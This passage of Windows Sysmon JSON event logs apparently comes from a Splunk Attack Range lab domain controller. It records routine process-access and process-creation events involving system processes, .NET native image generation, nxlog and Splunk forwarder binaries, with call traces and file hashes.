07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8329,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.466\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010DA0E0D00}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.466","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010DA0E0D00}","TargetProcessId":"5092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8330,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.482\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1369-5F25-0000-00101E910E00}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.482","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1369-5F25-0000-00101E910E00}","TargetProcessId":"5092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8331,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.544\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-0010A1F20B00}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.544","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-0010A1F20B00}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8332,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.544\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-0010A1F20B00}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.544","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-0010A1F20B00}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8333,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.544\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-0010A1F20B00}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.544","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-0010A1F20B00}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8334,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.826\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.826","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8335,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.857\r\nProcessGuid: {E2A3D6B1-1369-5F25-0000-001027980E00}\r\nProcessId: 1476\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.857","ProcessGuid":"{E2A3D6B1-1369-5F25-0000-001027980E00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8336,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.857\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1369-5F25-0000-001027980E00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.857","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1369-5F25-0000-001027980E00}","TargetProcessId":"1476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8337,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.857\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1369-5F25-0000-001027980E00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: 